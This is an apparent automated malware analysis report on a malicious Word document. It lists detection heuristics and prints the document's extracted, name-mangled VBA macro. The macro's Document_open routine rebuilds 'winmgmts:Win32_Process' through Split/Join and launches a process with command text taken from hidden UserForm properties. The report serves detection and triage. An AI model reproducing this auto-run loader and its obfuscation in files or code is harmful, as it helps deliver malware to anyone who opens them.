Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4238edf14ccf44a8…

MALICIOUS

Office (OLE)

201.2 KB Created: 2019-12-19 01:42:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 8bbbb2cd9a3faf5a87c2134bc3d57c73 SHA-1: 7547bdf060db8cd399e789a3a950ef7ead505f96 SHA-256: 4238edf14ccf44a8a708783b65c26e4d0e184161c45bb4e4444b1d656ac234ae
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Sagent-7465099-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7465099-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11036 bytes
SHA-256: a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
301 of 514 identifiers look randomly generated (e.g. 'Xbsfnwonrotla') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Bhhujcbq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Ueivmgxho = (656)
Dim Getvdfjfrbwzj As String
Dim Ftnurdovblkhv As Boolean
Dim Vneptxpeb As Integer
Dim Zlfyfyvmbd As Boolean
Dim Murjsktxomjg As Integer
Dim Uhcppmnfedqc As Integer
Dim Mirdburubo As Boolean
Hjxnbypjenkm = (583)
Dim Ghqnsqdil As Boolean
Gfodafnsvedh = ("Est tempora recusandae.")
Rmwgyyfo = (909)
Dim Jenvgqyystu As String
Feiwttcc = Lbdhbngorlatv
Leffoxhylqcq = Vqljecudjx
Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas."
Lbddsqzxecwup = 293
   Rnjpdlae = Vnsbliid
Wavrxtqcsvtq = 61
Fnpnynpxyb = ("Amelia")
Byrvyori = (925)
Dim Ssskuxmtkfr As Integer
Dim Ysvelcyctcvr As String
Dim Wxeznfpvxv As Double
Dim Rkeqjjvdtccj As Boolean
Dim Ioyqwtdmq As String
Dim Geagdvaqt As String
Dim Ycsmvoruvvt As String
Bwgyuoeuildfv = (180)
Dim Gcsmvuqwxkx As Integer
Vaknwdegpbve = ("Earum.")
Prohaqansdgm = (320)
Dim Aioxzjyibq As Boolean
Sjrbwhpaaej = Yvihggjatggmy
Uhqyyjyqvrgzx = Vzlaaoqauk
Ydloycsgtok = "Iste rerum adipisci fuga."
Aenqahmzjlg = 172
   Xbsfnwonrotla = Kttpxxvjlnj
Yuteibyzsgn = 967
Rztfitowi = ("Est.")
Ktccsgrehypxv = (521)
Dim Yrrrmfbq As Boolean
Dim Pgfpatpmuuozw As String
Dim Pjghccyqeu As Boolean
Dim Qvticvfca As Integer
Dim Hfzkavpzukf As Boolean
Dim Vjeurqavdnzr As String
Dim Ldqeldvzcc As Double
Upucvkyyntrll = (134)
Dim Sdratzjdwd As String
Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.")
Cyrlftbrcvkc = (913)
Dim Llyyqqexrnqis As Double
Sbzlaxlm = Ltbyavyeukybd
Oegevxalrjtlr = Zzoaewdz
Rdxfcqyxmlsf = "Sit blanditiis ducimus."
Akhkogkhgtk = 61
Pihlzkcicga
End Sub

Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
   Iczpkrbxsfrj = Cboniugn
Rdyqpfkuf = 738
Pxftmuoc = ("Alton")
Hogqsoqjmou = (794)
Dim Xhskinuxeham As Double
Dim Tvzrlcqkor As Integer
Dim Rtktripehmtjf As Boolean
Dim Sdhfdoewn As Boolean
Dim Jxcmsakmvanlq As Integer
Dim Abhcpmvwyhhmw As Boolean
Dim Wwgtysbuts As Boolean
Uferrmhodplx = (504)
Dim Bdfloneidre As Integer
Eygnjptbqtpq = ("Ellen")
Ujhkjjkqyph = (261)
Dim Plbnmvscqw As Double
Hrmkkpvp = Zwgvmknzrf
Eqpgcugm = Ficsxgozmon
Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim."
Wvdnailglrx = 453
Ewajapcv = Bhhujcbq.Guqlecwzw
   Gwfxeyindhu = Noolpphajhbdh
Vtwkoathq = 631
Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.")
Vthomxoeuw = (498)
Dim Sjkkfyug As Integer
Dim Hpnadtopuvli As Double
Dim Caovtmzm As Double
Dim Hwdbioinodm As Boolean
Dim Luvpebes As String
Dim Iifkznlrvo As Boolean
Dim Gqnhgmyuupjz As Double
Xwvkwyyl = (318)
Dim Cejzdlrdetne As Integer
Vrupqsyghypow = ("Alberto")
Yuvvuebdyqiy = (701)
Dim Jmtuypfdiubu As Double
Lkppglfysjist = Zitslylwuyvn
Btzifsobts = Kujmfwrijmi
Yanurlxkmq = "Vitae."
Knvhypbxvn = 938
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
   Izugkvgxkaej = Fnonjqyisl
Ksmawuuv = 791
Xbrvovzmbpv = ("Alison")
Uokrwuah = (570)
Dim Kknljdjpepqpm As Double
Dim Bcigksexrrm As String
Dim Xbthodhk As Boolean
Dim Qiraqxlebo As Integer
Dim Srayffnwtxqg As Boolean
Dim Wjbioczs As Boolean
Dim Ssnzgnkyycjbg As Boolean
Bxfqsskjnbbdt = (380)
Dim Vzydgmro As Integer
Nshouudlj = ("Leo")
Ubafhjaxe = (969)
Dim Yxhjcdjmjjp As Integer
Adutgyrjm = Xyxydrql
Tkgkrabxdwfrv = Ohrgshmb
Dflissdpih = "Ut et."
Ioxqlizwgds = 196
Xuqwgcezqphh = Anrqtfgp + Vyeoqakxxt.Fppravids + Vyeoqakxxt.Kyqvjoudjwp.Factoid
   Fpbjrhfxw = Aydwqnubbt
Oyxhbwvrytub = 119
Eqrpfmaesyyq = ("Eileen")
Kayosxnkuze = (816)
Dim Lmhebvxi As String
Dim Mnarjgyjky As Boolean
Dim Yvfjdftws As String
Dim Mprltxvaf As Double
Dim Masgdevqtct As String
Dim Lyrrsohqain As Double
Dim Uempxczhjfrx As Double
Bcrdtkczvfd = (740)
Dim Zalseekjqde As Boolean
Fgctzuqzgoj = ("Quo est voluptates qui debitis.")
Qqvjglqmzhym = (477)
Dim Rfkymycfvxbg As Integer
Qtlbnjouogw = Dgzehlbztvq
Sluyiabzv = Wyeexrebtkyzw
Uhrxyufhqcaq = "Consequatur temporibus."
Rpiadhihxbbqp = 922
Ujjteelnxf = Aabasifsnt + Xuqwgcezqphh + Aabasifsnt
   Plvwvanucwrk = Qisfbndjikq
Mxgozgztfgebo = 623
Jyyktpxxolth = ("Darin")
Clfadaxwh = (696)
Dim Wvlboemw As Integer
Dim Klgbhozs As Integer
Dim Zincvyakq As Double
Dim Qggwtmvahgk As Integer
Dim Szyzvmxde As Integer
Dim Ohigpdcgk As Boolean
Dim Ezeocerwzozi As Integer
Abodzjmucild = (795)
Dim Deeysyvyuh As String
Lhnpozykpbnc = ("Erin")
Hkxwczpg = (971)
Dim Kaplabghugxe As Integer
Tmfevcrbon = Byfkdfpsfo
Kovghegcdld = Lkqdimbtqaib
Roogecst = "Odit sunt et quis minus ratione tempora."
Ltjhohpup = 577
End Function
Function Pihlzkcicga()
   Fkfzdcfhjo = Otqaceobhkii
Odklvcigxh = 300
Ltpmudstwzeca = ("Maiores alias dolorem iure quam autem culpa minus dolores et.")
Pdvbwxrnbx = (614)
Dim Nnivjoetvlvq As Boolean
Dim Iooyhlkrsdc As Boolean
Dim Btfooxkegod As Boolean
Dim Wspdhewfocy As Integer
Dim Miwuetdyczp As Boolean
Dim Ttlcakdto As String
Dim Ovxiknqh As Double
Lciljkrpuszgb = (24)
Dim Tlcnzvxq As Double
Jwuopiimh = ("Qui enim ipsa aliquam ab facilis.")
Drqalduzbit = (761)
Dim Qbotldnmn As String
Oxbekrtudlqul = Rcqtwpjoynu
Dueqlqmo = Okpzjuzhchx
Vujkeidrpc = "Qui."
Igajuazpmbj = 944
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"
   Gjriqmdi = Mvgfnith
Dwabqbyyqep = 770
Eocxbjzaho = ("Nesciunt.")
Pcdohakrbzj = (199)
Dim Spofsaovkbq As Double
Dim Rxcmvhqmby As Double
Dim Idfzjffshj As Integer
Dim Vonvseamdw As Boolean
Dim Podbsdrqtu As Integer
Dim Ivbwlsdidrrht As Integer
Dim Wxigmutkubdz As Double
Dsaeqmxcdbkt = (855)
Dim Xxwhxkusk As String
Cpkhvitypazqc = ("Laudantium rerum fugiat consequatur.")
Wtthvttlnx = (101)
Dim Cuxkhmhoxmvi As String
Uliygueonbyd = Jdxkqnqer
Evolkxlodyhd = Lqogwmdtcft
Sfapttgcyp = "Veniam."
Dnpofbai = 926
Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)
   Kuohwvlsn = Ksxohhfx
Lmzoabarlw = 821
Kjlkwuuiyiwus = ("Sean")
Pamttfvz = (153)
Dim Twtlabnlnhn As String
Dim Kldnldpewyxkr As String
Dim Vrpjdwdy As String
Dim Ygijeuqneciqr As Integer
Dim Sjxyvbjclqvsd As Integer
Dim Hncqnwgv As Double
Dim Hwnxtezg As Boolean
Mgaevoexsj = (697)
Dim Odvvnbvalo As Double
Oevfrlwmqnna = ("Cupiditate ea.")
Vyrjciauhjbyr = (236)
Dim Nyyafqrtzf As Integer
Qwapuipgxi = Xttwmdtuyb
Pahhdfsevvk = Thpcsmewm
Wugwlmootl = "Necessitatibus ipsum impedit et sed."
Bhcrqypcjvps = 580
Ndmpnxhpe = Gmrruxtnv + Vyeoqakxxt.Wmavoqxmgboj.ControlTipText + Vyeoqakxxt.Nrjoictfpsbhb.ControlTipText
   Pusxrfkyrv = Qjzvswqisc
Yusqcpucz = 250
Asrhrydexulf = ("Nostrum eum.")
Wxizbsnhkyxm = (789)
Dim Cbkmxoycbpzjp As Boolean
Dim Nmozvgrmdya As String
Dim Isjeehcwjzid As String
Dim Wszrcorxljnz As Boolean
Dim Phoxheuigv As Integer
Dim Wtdnfvymv As String
Dim Gxsclgar As Boolean
Rgcklwszome = (822)
Dim Sytydradpwdh As Boolean
Cjbfdarembc = ("Qui facere distinctio alias aut unde voluptate ipsam.")
Gmhgzudzdriwa = (434)
Dim Ckydlhqqmga As Integer
Olrvirtq = Dmwpyrtidwd
Czjrqwua = Alranoikwu
Qprrysxxoynj = "Quas."
Zzdunofcvehr = 282
Vukrttxfex = Ndmpnxhpe + Bhhujcbq.Guqlecwzw
   Hjbxxozmhbpse = Funeqkpubkv
Ycggobfg = 47
Bkrxjdomevoa = ("Praesentium minima dolor iste voluptate consequatur porro quidem quaerat molestias.")
Gqospanbk = (582)
Dim Fvjedhirbmu As Integer
Dim Frnxrjlyaa As String
Dim Mnqofzzsjeiei As Boolean
Dim Gjztmrbmymp As Boolean
Dim Nqeukgqu As Integer
Dim Wnugdaii As Double
Dim Vfoahmgkasb As Integer
Yftzoucltog = (866)
Dim Rkympebvf As Integer
Emxzftzb = ("Qui vel id quae atque quam rem repellat eaque.")
Vbkbunmecqixb = (680)
Dim Mocxossxsvbwc As Integer
Pfxgvjnkvqpqd = Glcesewdrgde
Tqjydbdzv = Zdhhzbpfzo
Ymusbgaseufb = "Blanditiis assumenda."
Szqphqert = 165
Set Pihlzkcicga = CreateObject(Vukrttxfex)
   Rxequqqb = Tfuvrmbdriwxh
Bjyqybkpapfo = 721
Foxseidnji = ("Jacob")
Dfkhuqswsgslj = (601)
Dim Puglyctluz As Boolean
Dim Dqoaqzbx As Integer
Dim Supwcrzvm As Boolean
Dim Zntcwtvkuq As Double
Dim Nogdgclixdl As String
Dim Vbzblynxtd As Double
Dim Xtgfnkolgciw As Double
Tazmvcrrbrvj = (674)
Dim Uqtkeijifckt As Boolean
Fstcnsenyhi = ("Jeanette")
Fsokdbvq = (566)
Dim Xsfjluwbc As Integer
Miysvpng = Ceedqrsgsb
Kvkhjtscffu = Jqrilijxvvob
Ddvkebwyciog = "Fugit dicta dicta."
Phwjbjgaayg = 10
Pihlzkcicga.XSize = False
   Xklvlkol = Attzmwskefew
Ktoywvtldgehl = 174
Nxpozpsz = ("Laborum dolores.")
Wdxwozbspksv = (888)
Dim Zzpqnvekwgr As Double
Dim Htgsuldaswo As Double
Dim Cpwllrhbp As Boolean
Dim Blhplgqegkuzi As String
Dim Klngdabgspnlv As Integer
Dim Orthqido As String
Dim Fjhwiposng As String
Iwyzfpaxvve = (760)
Dim Cgbcphxyuxquj As Double
Zshteaiwiqcnn = ("Eaque ut eligendi quis.")
Kfbzgjmqxzx = (244)
Dim Zhfwfaxcnlb As String
Ktmntkhenlsj = Ncktgluwakg
Towtaemztd = Nhjmvnmbl
Dsujynsbglxnp = "Ratione voluptates."
Sfrqtyznselk = 71
Pihlzkcicga.YSize = False
   Mcaiommgwkw = Fzecguzoptrq
Kgicteuavqhg = 731
Spyzawtee = ("Deleniti magnam.")
Avzxijsytban = (528)
Dim Aaedouzs As Integer
Dim Avrqtzgcxjtiu As Double
Dim Hphjdsbqwz As Double
Dim Aqpticdxmrc As Double
Dim Vxpxjsfcrgfr As Boolean
Dim Dyeuqxkfmhp As String
Dim Qfzpncohv As Integer
Nhqmjjkbzmaz = (324)
Dim Likqkhhxmowrr As String
Uiimlhjgxwd = ("Pariatur laboriosam.")
Ltqgrsbterl = (554)
Dim Pubqrsrmee As Integer
Wpcbmugktm = Payrvpqxharof
Lgbgpztvd = Sxeurdcdaqtz
Nuewxowepvd = "Qui in laudantium dolor."
Cyweutdxt = 482
Do While Htnnhzcl.Create(UJNDB & Ujjteelnxf, Mfwatbva, Pihlzkcicga, Tpxiznofetm)
Loop
   Kxfhjrufs = Vzlwjnsqktrah
Edpfolfu = 554
Stymdgeu = ("Omnis voluptate quia voluptas.")
Itxjxgumnsxx = (742)
Dim Mrpnamqed As String
Dim Ttegmngfcvl As String
Dim Ihrshofuh As String
Dim Mrqtocepdsdnp As Double
Dim Frsjjali As Integer
Dim Uxwpoxmzfuvw As Integer
Dim Zrvbneucmgj As String
Ykyailbu = (866)
Dim Apvrnklfi As Integer
Ksfjvays = ("Qui laborum ratione.")
Fzvopgtmllw = (431)
Dim Vmsngsbabj As String
Strnkccuqup = Yerswteq
Xcnszipequ = Mczaiuytawski
Iepwxkjtlx = "Henrietta"
Mbqygcar = 378
End Function